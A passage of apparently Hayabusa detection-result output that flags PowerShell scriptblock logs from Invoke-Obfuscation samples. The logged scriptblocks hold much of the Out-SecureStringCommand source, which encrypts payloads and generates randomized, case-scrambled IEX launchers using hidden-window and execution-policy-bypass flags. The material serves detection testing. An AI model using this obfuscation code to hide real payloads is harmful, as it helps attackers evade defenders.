Dependencies: None Optional Dependencies: None .DESCRIPTION Out-SecureStringCommand encrypts an input PowerShell scriptblock or path as a SecureString object. It randomly selects between three different syntaxes for accomplishing this. The purpose is to highlight to the Blue Team that there are more novel ways to encode/encrypt a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfi -NonIn "" IEX( ([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('76492d1116743f0423413b16050a5345MgB8AG0AOQBKAEcAZgBHAEwAaQBBADkAbABoAFQASgBGAGEATgBBAFUAOABIAGcAPQA9AHwAYwBmADEAZgA4ADQAYgAyADkAZgBjADcAOABiAGYAYgBkADAAZAA5AGMAMgBlADgAZQBjADIAOAAxADYAOQBhADYANQBkADYANQA3ADEAMAAwADQAMwBjADgAMAA1AGMAZAAwADYAOQAxAGIAMQA5ADYAYwAwADQAMAA1AGEAOAA5ADEANwA1ADgANgA5ADEANABhAGQAMABhAGEANwAxAGUAZgBjADcAZABiADMAYgBlADgAYQBhAGIAMAAyADIANwA2AGYAYwBhAGQANwA0ADkAOAA2ADEAMAA0ADIAYQBkAGYAMAA5ADgAMwAzAGEAYwBmADYANQA5ADAANQA0ADcAYgAwADEANAAyADgAMwBmADUAMQAzADAAMQBmADAAZABkAGIAOQAxAGIAZQAxADIAZQA2ADIAMgAxADgAOAA5ADEANgA1AGEANgA2AGEAZABjADcAZQAwAGIANgBmADEANgA2ADAAMwBjADEANQAzAGUAZgBkADUAYQAwADYAMgBmAGMAOAAxAGUANgBmADgAYwA5ADUAZgBlADMANAA1ADQANQA3ADIANgA2ADYAOQBlAGUANwBkAGUAYQAyAGIAZAA2AGUAZgBiADUANwA4AGQANQA5ADIANgBjADMAZgBlADUANQA4AGMAOQBjADcANQA2ADEAYwA3ADQAYwAzAGUAZAA4ADkAOABlAGYANAA5AGUAZQAwADYAMgAxAGEAZgA2ADIAOABkAGYANwA4AGIAOAA1ADQANgA2ADIAYgBkAGQANAA4AGYANwA4AGYAYQBmAGIAZAAyAGMAYgBiADkANQBlADIAYwAyADYANABkADgAMgA2AGIAZQBlADIAZQBlAGUAOQA0AGIANgAxADIAZgA0ADIAOQBmADAAYwBmADIAOQBmAGYANgBlAGUAZAA3ADMAMAA0ADMAYwBjADQAMgBhAGIAZgA4ADAAMQA1ADYAOQA5AGYAZQA4AGIAMwBhAGMAOQAyADcAYwA2AGQAMgBmAGYANwA4AGQAOABiADAAZQBmADcANgBlAGIAMwBiADgAMwAxADcAZQBlAGQAYQBmAGYAYgBmAGIAYQA5AGEAYQBhAGQAOAA5AGQAZgAwAGMAMgAwAGUANQBlADcAOQA5ADAAZgBkADkAZAAwADMAYQBhADIAZAA0ADcAOQBkADAANgA1ADUAOAA=' |ConvertTo-SecureString -Key 241,131,91,52,14,165,71,51,19,86,1,104,87,220,235,62) ))) )"" C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru (New-Object Management.Automation.PSCredential ' ', ( '76492d1116743f0423413b16050a5345MgB8AEUAcQBKAHkAegBqAHUAQwBNAC8AeABPAHUAbgBlADAAUABMAHQARQAyAGcAPQA9AHwAMgBlAGEANQBiADMAMAA0ADMANQBkAGIAMQA2AGUAYwA2ADIANwAyADEANAA5ADUAYwAyADkAOAAzADUAZAAwADcANAAwADQAOQA0AGQAZQAwADUAYwBjADUAZgAwADYAYgA0AGIAYQA0AGYANwAxADUAMwA1AGUANQAxAGMANwBiADAANgA3ADgAOABmAGQAYwBjADYAMAA4AGYAZQAyADEAZAAyADQAMgBkAGYAYwBmADkAZQA5ADkAMwBmAGMAZAAzADgAOQAwADEANQBhADcANAA5AGUANQBiAGMAOAA2ADYAOAAxAGYAMwAxAGYAMwA4AGQANAA0ADAAYgA3ADUAMwBkADcAMQAwADAANABlAGIAOQAxAGIAOQAxADcAZgBjAGEANAA4ADUAOQBlADUAOAA1AGEANwBjADUAYQAwADgAOAAyAGEAMAAzADQAMQA3ADYAMwA0AGUAMwBiADUAZgA3AGMAMwA5AGQAZQAyADkAMgAxADAAMgA5ADUAMwBmADMAOAA5ADQAYwAyAGUANwA5AGMAMgA5ADEAMAAwAGEAMgAyAGQANQA4ADAAZQBiAGMAZAA1ADkAMgBlAGQAOAAyADIAZAA3ADQAYQBmADIANwAwADQAMQAzADQANgAxADQAMwA5ADgANQBlADIANQA2ADEAMwBiAGUAMwBhAGMAMQAwADIAYQBjAGMAYgA5AGUAYQBjAGQAZQAyADYAYgAyADkAZABjAGEAMAA4ADIANAA1AGMAOAAzADgAZgAyAGEAMABlAGYANAAwAGEAMgAyADgANQBlADkAMgAyAGEANgA0ADQANwBlADAAYgA0ADkAMgBkAGMANgAwAGMANwA3ADUAZABhADkAMgA1ADAAYgA0ADgAYQBmAGIAMQBjADEAMgA2ADEAZgA0ADkANgA4AGYAMQA0ADkAMAA0AGYANwBjAGMAYQBiAGQAZQA4ADIAMAA1AGUAZgA4ADMAZQAwAGMAYQBlADQAMgBkAGIAOQBkADUANwAzADQANwAyAGIAYwAxADQAYwBiAGEAZAA2AGYAZQAzADUAYgAxADgAYgBhADcANQAyADkAMAAwADcAMAA0ADQANgBlAGMAYQA1ADQAMQBhAGYAYgAzADYANwBjAGIAZgAyAGEAYgBkADgAZAAwAGEAZgBmADYAMQA2AGIAMAA1AGIANQA=' |ConvertTo-SecureString -Key 205,39,9,9,104,139,104,94,252,20,93,132,29,171,56,2 )).GetNetworkCredential().Password | Invoke-Expression .NOTES The size limit for a single SecureString object input is 65,536 characters. However, this will consume significant resources on the target system when decoding a SecureString object of this size (50% CPU and ~30 seconds on several test VMs). For larger payloads I would recommend chunking your payload and encoding/encrypting each piece separately and then reassembling each decoded/decrypted piece during runtime. I have a POC that does this and will be releasing a STAGING set of functions soon to accomplish this very task. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to a SecureString object. $SecureString = ConvertTo-SecureString $ScriptString -AsPlainText -Force # Randomly select the key length. Supported key lengths for SecureString (AES) are 16, 24 and 32. $KeyLength = Get-Random @(16,24,32) # Randomly select the key value and how it will be formatted. Switch(Get-Random -Minimum 1 -Maximum 3) { 1 { # Generate random key of length $KeyLength. $SecureStringKey = @() For($i=0; $i -lt $KeyLength; $i++) { $SecureStringKey += Get-Random -Minimum 0 -Maximum 256 } $SecureStringKeyStr = $SecureStringKey -Join ',' } 2 { # Generate sequential key of length $KeyLength with random array bounds. # To save space use shorthand array notation in final command with $SecureStringKeyStr. $LowerBound = (Get-Random -Minimum 0 -Maximum (256-$KeyLength)) $UpperBound = $LowerBound + ($KeyLength - 1) Switch(Get-Random @('Ascending','Descending')) { 'Ascending' {$SecureStringKey = ($LowerBound..$UpperBound); $SecureStringKeyStr = ""($LowerBound..$UpperBound)""} 'Descending' {$SecureStringKey = ($UpperBound..$LowerBound); $SecureStringKeyStr = ""($UpperBound..$LowerBound)""} default {Write-Error ""An invalid array ordering option was generated for switch block.""; Exit;} } } default {Write-Error ""An invalid random number was generated for switch block.""; Exit;} } # Convert SecureString object to text that we can load on target system. $SecureStringText = $SecureString | ConvertFrom-SecureString -Key $SecureStringKey # Generate random syntax for -Key command argument. $Key = (Get-Random -Input @(' -Key ',' -Ke ',' -K ')) # Randomly choose member invocation syntax. "".Invoke"" syntax below is not necessary for PS 3.0+ $PtrToStringAuto = (Get-Random -Input @('PtrToStringAuto',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(3,5)) + '].Name).Invoke'))) $PtrToStringUni = (Get-Random -Input @('PtrToStringUni' ,('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(2,4)) + '].Name).Invoke'))) $PtrToStringAnsi = (Get-Random -Input @('PtrToStringAnsi',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(0,1)) + '].Name).Invoke'))) # Below four notations are commented out as they only work on PS 3.0+ #$PtrToStringBSTR = (Get-Random -Input @('PtrToStringBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[142].Name).Invoke')) #$SecureStringToBSTR = (Get-Random -Input @('SecureStringToBSTR' ,'([Runtime.InteropServices.Marshal].GetMembers()[162].Name)')) #$SecureStringToGlobalAllocUnicode = (Get-Random -Input @('SecureStringToGlobalAllocUnicode','([Runtime.InteropServices.Marshal].GetMembers()[169].Name)')) #$SecureStringToGlobalAllocAnsi = (Get-Random -Input @('SecureStringToGlobalAllocAnsi' ,'([Runtime.InteropServices.Marshal].GetMembers()[168].Name)')) # Randomize the case versions for necessary operations. $PtrToStringAuto = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAuto("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringUni = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringUni("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringAnsi = ([Char[]]""[Runtime.InteropServices.Marshal]::$PtrToStringAnsi("" | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PtrToStringBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::PtrToStringBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToBSTR = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToBSTR(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocUnicode = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SecureStringToGlobalAllocAnsi = ([Char[]]'[Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocAnsi(' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $NewObject = ([Char[]]'New-Object ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $PSCredential = ([Char[]]'Management.Automation.PSCredential ' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ConvertToSecureString = ([Char[]]'ConvertTo-SecureString' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Key = ([Char[]]$Key | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $GetNetworkCredential = ([Char[]]').GetNetworkCredential().Password' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Set syntax for running ConvertTo-SecureString cmdlet. $ConvertToSecureStringSyntax = '$(' + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + ')' # Generate the code that will decrypt and execute the payload and randomly select one. $NewScriptArray = @() $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAuto + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringUni + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocUnicode + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringAnsi + ' '*(Get-Random -Input @(0,1)) + $SecureStringToGlobalAllocAnsi + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $PtrToStringBSTR + ' '*(Get-Random -Input @(0,1)) + $SecureStringToBSTR + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureStringSyntax $NewScriptArray += '(' + ' '*(Get-Random -Input @(0,1)) + $NewObject + ' '*(Get-Random -Input @(0,1)) + $PSCredential + ' '*(Get-Random -Input @(0,1)) + ""' '"" + ',' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + ""'$SecureStringText'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ConvertToSecureString + ' '*(Get-Random -Input @(0,1)) + $Key + ' '*(Get-Random -Input @(0,1)) + $SecureStringKeyStr + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + $GetNetworkCredential # Select random option from above. $NewScript = (Get-Random -Input $NewScriptArray) # Generate random invoke operation syntax. # Below code block is a copy from Out-ObfuscatedStringCommand.ps1. It is copied into this encoding function so that this will remain a standalone script without dependencies. $InvokeExpressionSyntax = @() $InvokeExpressionSyntax += (Get-Random -Input @('IEX','Invoke-Expression')) # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &. # Though far from fully built out (and not sure that I ever will), these are included to highlight how IEX/Invoke-Expression is a great indicator but not a silver bullet. # These methods draw on common environment variable values and PowerShell Automatic Variable values/methods/members/properties/etc. $InvocationOperator = (Get-Random -Input @('.','&')) + ' '*(Get-Random -Input @(0,1)) $InvokeExpressionSyntax += $InvocationOperator + ""( `$ShellId[1]+`$ShellId[13]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$PSHome["" + (Get-Random -Input @(4,21)) + ""]+`$PSHome["" + (Get-Random -Input @(30,34)) + ""]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:Public[13]+`$env:Public[5]+'x')"" $InvokeExpressionSyntax += $InvocationOperator + ""( `$env:ComSpec[4,"" + (Get-Random -Input @(15,24,26)) + "",25]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""(("" + (Get-Random -Input @('Get-Variable','GV','Variable')) + "" '*mdr*').Name[3,11,2]-Join'')"" $InvokeExpressionSyntax += $InvocationOperator + ""( "" + (Get-Random -Input @('$VerbosePreference.ToString()','([String]$VerbosePreference)')) + ""[1,3]+'x'-Join'')"" # Randomly choose from above invoke operation syntaxes. $InvokeExpression = (Get-Random -Input $InvokeExpressionSyntax) # Randomize the case of selected invoke operation. $InvokeExpression = ([Char[]]$InvokeExpression | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX) $InvokeOptions = @() $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $InvokeExpression + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) $InvokeOptions += ' '*(Get-Random -Input @(0,1)) + $NewScript + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $InvokeExpression # Select random option from above. $NewScript = (Get-Random -Input $InvokeOptions) # If user did not include -PassThru flag then continue with adding execution flgs and powershell.exe to $NewScript. If(!$PSBoundParameters['PassThru']) { # Array to store all selected PowerShell execution flags. $PowerShellFlags = @() # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order. # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags. $CommandlineOptions = New-Object String[](0) If($PSBou",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.271 +09:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx
+2017-08-31 03:15:55.271 +09:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant <http://www.mandiant.com> # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-SecureStringCommand { <# .SYNOPSIS Generates AES-encrypted SecureString object out of three possible syntaxes for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-SecureStringCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-SecureStringCommand encrypts an input PowerShell scriptblock or path as a SecureString object. It randomly selects between three different syntaxes for accomplishing this. The purpose is to highlight to the Blue Team that there are more novel ways to encode/encrypt a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoProfi -NonIn "" IEX( ([Runtime.InteropServices.Marshal]::PtrToStringUni( [Runtime.InteropServices.Marshal]::SecureStringToGlobalAllocUnicode( $('76492d1116743f0423413b16050a5345MgB8AG0AOQBKAEcAZgBHAEwAaQBBADkAbABoAFQASgBGAGEATgBBAFUAOABIAGcAPQA9AHwAYwBmADEAZgA4ADQAYgAyADkAZgBjADcAOABiAGYAYgBkADAAZAA5AGMAMgBlADgAZQBjADIAOAAxADYAOQBhADYANQBkADYANQA3ADEAMAAwADQAMwBjADgAMAA1AGMAZAAwADYAOQAxAGIAMQA5ADYAYwAwADQAMAA1AGEAOAA5ADEANwA1ADgANgA5ADEANABhAGQAMABhAGEANwAxAGUAZgBjADcAZABiADMAYgBlADgAYQBhAGIAMAAyADIANwA2AGYAYwBhAGQANwA0ADkAOAA2ADEAMAA0ADIAYQBkAGYAMAA5ADgAMwAzAGEAYwBmADYANQA5ADAANQA0ADcAYgAwADEANAAyADgAMwBmADUAMQAzADAAMQBmADAAZABkAGIAOQAxAGIAZQAxADIAZQA2ADIAMgAxADgAOAA5ADEANgA1AGEANgA2AGEAZABjADcAZQAwAGIANgBmADEANgA2ADAAMwBjADEANQAzAGUAZgBkADUAYQAwADYAMgBmAGMAOAAxAGUANgBmADgAYwA5ADUAZgBlADMANAA1ADQANQA3ADIANgA2ADYAOQBlAGUANwBkAGUAYQAyAGIAZAA2AGUAZgBiADUANwA4AGQANQA5ADIANgBjADMAZgBlADUANQA4AGMAOQBjADcANQA2ADEAYwA3ADQAYwAzAGUAZAA4ADkAOABlAGYANAA5AGUAZQAwADYAMgAxAGEAZgA2ADIAOABkAGYANwA4AGIAOAA1ADQANgA2ADIAYgBkAGQANAA4AGYANwA4AGYAYQBmAGIAZAAyAGMAYgBiADkANQBlADIAYwAyADYANABkADgAMgA2AGIAZQBlADIAZQBlAGUAOQA0AGIANgAxADIAZgA0ADIAOQBmADAAYwBmADIAOQBmAGYANgBlAGUAZAA3ADMAMAA0ADMAYwBjADQAMgBhAGIAZgA4ADAAMQA1ADYAOQA5AGYAZQA4AGIAMwBhAGMAOQAyADcAYwA2AGQAMgBmAGYANwA4AGQAOABiADAAZQBmADcANgBlAGIAMwBiADgAMwAxADcAZQBlAGQAYQBmAGYAYgBmAGIAYQA5AGEAYQBhAGQAOAA5AGQAZgAwAGMAMgAwAGUANQBlADcAOQA5ADAAZgBkADkAZAAwADMAYQBhADIAZAA0ADcAOQBkADAANgA1ADUAOAA=' |ConvertTo-SecureString -Key 241,131,91,52,14,165,71,51,19,86,1,104,87,220,235,62) ))) )"" C:\PS> Out-SecureStringCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru (New-Object Management.Automation.PSCredential ' ', ( '76492d1116743f0423413b16050a5345MgB8AEUAcQBKAHkAegBqAHUAQwBNAC8AeABPAHUAbgBlADAAUABMAHQARQAyAGcAPQA9AHwAMgBlAGEANQBiADMAMAA0ADMANQBkAGIAMQA2AGUAYwA2ADIANwAyADEANAA5ADUAYwAyADkAOAAzADUAZAAwADcANAAwADQAOQA0AGQAZQAwADUAYwBjADUAZgAwADYAYgA0AGIAYQA0AGYANwAxADUAMwA1AGUANQAxAGMANwBiADAANgA3ADgAOABmAGQAYwBjADYAMAA4AGYAZQAyADEAZAAyADQAMgBkAGYAYwBmADkAZQA5ADkAMwBmAGMAZAAzADgAOQAwADEANQBhADcANAA5AGUANQBiAGMAOAA2ADYAOAAxAGYAMwAxAGYAMwA4AGQANAA0ADAAYgA3ADUAMwBkADcAMQAwADAANABlAGIAOQAxAGIAOQAxADcAZgBjAGEANAA4ADUAOQBlADUAOAA1AGEANwBjADUAYQAwADgAOAAyAGEAMAAzADQAMQA3ADYAMwA0AGUAMwBiADUAZgA3AGMAMwA5AGQAZQAyADkAMgAxADAAMgA5ADUAMwBmADMAOAA5ADQAYwAyAGUANwA5AGMAMgA5ADEAMAAwAGEAMgAyAGQANQA4ADAAZQBiAGMAZAA1ADkAMgBlAGQAOAAyADIAZAA3ADQAYQBmADIANwAwADQAMQAzADQANgAxADQAMwA5ADgANQBlADIANQA2ADEAMwBiAGUAMwBhAGMAMQAwADIAYQBjAGMAYgA5AGUAYQBjAGQAZQAyADYAYgAyADkAZABjAGEAMAA4ADIANAA1AGMAOAAzADgAZgAyAGEAMABlAGYANAAwAGEAMgAyADgANQBlADkAMgAyAGEANgA0ADQANwBlADAAYgA0ADkAMgBkAGMANgAwAGMANwA3ADUAZABhADkAMgA1ADAAYgA0ADgAYQBmAGIAMQBjADEAMgA2ADEAZgA0ADkANgA4AGYAMQA0ADkAMAA0AGYANwBjAGMAYQBiAGQAZQA4ADIAMAA1AGUAZgA4ADMAZQAwAGMAYQBlADQAMgBkAGIAOQBkADUANwAzADQANwAyAGIAYwAxADQAYwBiAGEAZAA2AGYAZQAzADUAYgAxADgAYgBhADcANQAyADkAMAAwADcAMAA0ADQANgBlAGMAYQA1ADQAMQBhAGYAYgAzADYANwBjAGIAZgAyAGEAYgBkADgAZAAwAGEAZgBmADYAMQA2AGIAMAA1AGIANQA=' |ConvertTo-SecureString -Key 205,39,9,9,104,139,104,94,252,20,93,132,29,171,56,2 )).GetNetworkCredential().Password | Invoke-Expression .NOTES The size limit for a single SecureString object input is 65,536 characters. However, this will consume significant resources on the target system when decoding a SecureString object of this size (50% CPU and ~30 seconds on several test VMs). For larger payloads I would recommend chunking your payload and encoding/encrypting each piece separately and then reassembling each decoded/decrypted piece during runtime. I have a POC that does this and will be releasing a STAGING set of functions soon to accomplish this very task. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to a SecureString object. $SecureString = ConvertTo-SecureString $ScriptString -AsPlainText -Force # Randomly select the key length. Supported key lengths for SecureString (AES) are 16, 24 and 32. $KeyLength = Get-Random @(16,24,32) # Randomly select the key value and how it will be formatted. Switch(Get-Random -Minimum 1 -Maximum 3) { 1 { # Generate random key of length $KeyLength. $SecureStringKey = @() For($i=0; $i -lt $KeyLength; $i++) { $SecureStringKey += Get-Random -Minimum 0 -Maximum 256 } $SecureStringKeyStr = $SecureStringKey -Join ',' } 2 { # Generate sequential key of length $KeyLength with random array bounds. # To save space use shorthand array notation in final command with $SecureStringKeyStr. $LowerBound = (Get-Random -Minimum 0 -Maximum (256-$KeyLength)) $UpperBound = $LowerBound + ($KeyLength - 1) Switch(Get-Random @('Ascending','Descending')) { 'Ascending' {$SecureStringKey = ($LowerBound..$UpperBound); $SecureStringKeyStr = ""($LowerBound..$UpperBound)""} 'Descending' {$SecureStringKey = ($UpperBound..$LowerBound); $SecureStringKeyStr = ""($UpperBound..$LowerBound)""} default {Write-Error ""An invalid array ordering option was generated for switch block.""; Exit;} } } default {Write-Error ""An invalid random number was generated for switch block.""; Exit;} } # Convert SecureString object to text that we can load on target system. $SecureStringText = $SecureString | ConvertFrom-SecureString -Key $SecureStringKey # Generate random syntax for -Key command argument. $Key = (Get-Random -Input @(' -Key ',' -Ke ',' -K ')) # Randomly choose member invocation syntax. "".Invoke"" syntax below is not necessary for PS 3.0+ $PtrToStringAuto = (Get-Random -Input @('PtrToStringAuto',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(3,5)) + '].Name).Invoke'))) $PtrToStringUni = (Get-Random -Input @('PtrToStringUni' ,('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(2,4)) + '].Name).Invoke'))) $PtrToStringAnsi = (Get-Random -Input @('PtrToStringAnsi',('([Runtime.InteropServices.Marshal].GetMembers()[' + (Get-Random -Input @(0,1)) + '].Name).Invoke'))) # Below four notations are commented out as they only work on PS 3.0+ #$PtrToStringBSTR = (Get-Random -Input 